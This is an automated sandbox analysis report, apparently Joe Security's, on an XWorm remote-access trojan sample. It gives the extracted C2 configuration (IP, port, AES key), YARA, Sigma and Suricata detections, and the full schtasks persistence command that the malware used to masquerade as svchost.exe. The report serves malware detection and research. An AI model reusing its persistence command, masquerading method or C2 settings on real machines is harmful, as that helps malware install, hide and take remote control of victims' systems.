Windows Analysis Report
WV7Gj9lJ7W.exe

Overview

General Information

Sample name: WV7Gj9lJ7W.exe (renamed because the original name is a hash value)
Original sample name: 45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a.exe
Analysis ID: 1561588
MD5: f5869349b4c3c5902601673ccb454f8c
SHA1: 0b164e7101927fe06ddbb98b0a85bdd7757f1734
SHA256: 45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WV7Gj9lJ7W.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
    • schtasks.exe (PID: 6208 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1720 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 2448 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 3868 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 984 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • cleanup
{"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
WV7Gj9lJ7W.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
WV7Gj9lJ7W.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
WV7Gj9lJ7W.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
WV7Gj9lJ7W.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
WV7Gj9lJ7W.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10151:$s6: VirtualBox
  • 0x100af:$s8: Win32_ComputerSystem
  • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11e33:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
C:\Users\user\AppData\Local\Temp\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10151:$s6: VirtualBox
  • 0x100af:$s8: Win32_ComputerSystem
  • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11e33:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x20bc9:$s6: VirtualBox
  • 0x20b27:$s8: Win32_ComputerSystem
  • 0x2382e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x238cb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x239e0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x228ab:$cnc4: POST / HTTP/1.1
00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Source | Rule | Description | Author | Strings
0.0.WV7Gj9lJ7W.exe.c00000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.WV7Gj9lJ7W.exe.c00000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.WV7Gj9lJ7W.exe.c00000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.0.WV7Gj9lJ7W.exe.c00000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10151:$s6: VirtualBox
  • 0x100af:$s8: Win32_ComputerSystem
  • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11e33:$cnc4: POST / HTTP/1.1

System Summary

Source: File created
Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
Data: EventID: 11, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe

Source: Registry Key set
Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
Data: Details: C:\Users\user\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Source: Process started
Author: David Burkett, @signalblur
Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe

Source: Process started
Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\user\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Source: File created
Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Data: EventID: 11, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe", ParentImage: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ParentProcessId: 6880, ParentProcessName: WV7Gj9lJ7W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 6208, ProcessName: schtasks.exe

Source: Process started
Author: vburov
Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started
Author: Joe Security
Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe", ParentImage: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ParentProcessId: 6880, ParentProcessName: WV7Gj9lJ7W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 6208, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:05:09.461983+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:05:22.397821+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:35.078050+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:35.451440+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:46.991636+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:59.267623+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:05.101176+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:11.549167+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:13.131562+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:14.643237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:14.853519+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:20.167925+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.137384+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.347308+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.513261+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:30.676427+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:31.032166+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:35.112652+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.039461+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.453248+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.577525+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:51.654773+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:51.865118+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:52.611373+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:04.881338+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:05.114900+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:06.522645+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:08.971165+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:21.272547+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:26.353000+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:28.957630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:30.374088+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:35.152096+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:35.583856+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:44.662640+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:47.910781+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:48.808516+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:55.471231+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:55.962843+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:04.155869+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:05.095467+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:06.675480+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:17.083526+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:27.724238+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:27.973037+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:28.743924+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:35.150293+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:37.728440+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:42.957033+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:48.144468+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:53.227048+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:57.895371+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:58.227147+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:09:04.665319+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:09:05.094644+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:09:06.781238+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:09:19.091410+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:05:22.465831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:35.453664+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:46.994001+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:59.277702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:11.559813+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:13.137609+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:14.645165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:14.855413+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:20.174352+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.181200+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.360656+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.519507+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:30.678923+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:30.925272+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:31.034909+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:31.054378+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:41.533917+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:41.697319+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:51.658601+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:51.868469+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:52.613190+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:04.886631+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:06.524879+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:08.973095+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:21.275253+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:26.355168+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:28.959846+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:30.376164+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:35.592877+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:44.665162+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:47.913494+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:48.810715+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:55.473795+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:55.964678+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
